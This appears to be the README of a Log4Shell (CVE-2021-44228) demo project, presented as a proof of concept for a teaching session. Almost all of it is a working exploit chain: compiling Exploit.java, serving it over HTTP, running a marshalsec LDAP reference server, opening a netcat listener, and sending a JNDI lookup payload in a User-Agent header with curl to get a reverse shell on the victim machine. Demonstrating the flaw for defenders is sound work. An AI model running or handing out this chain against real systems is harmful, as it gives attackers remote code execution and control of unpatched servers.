A log4j vulnerable app used in a log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability
-
Compile Exploit.java and start http server
cd Log4jExploitDemo/exploit
javac Exploit.java
- start http server,python
python3 -m http.server
or php,php -S 127.0.0.1:8000
-
Start ldap server
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
- start ldap server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit"
-
Setup a netcat listener on the attacker machine
nc -lnvp 9999
-
Run the vulnerable application
- gradle must be installed in the victim machine https://gradle.org/install/
- ncat must be installed in the victim machine for this to work
sudo apt install ncat
cd Log4jExploitDemo && gradle run
-
Trigger the exploit and get a reverse shell in the netcat listener
curl -H 'User-Agent: ${jndi:ldap://<attacker-ip>:1389/Exploit}' http://<victim-ip>:9090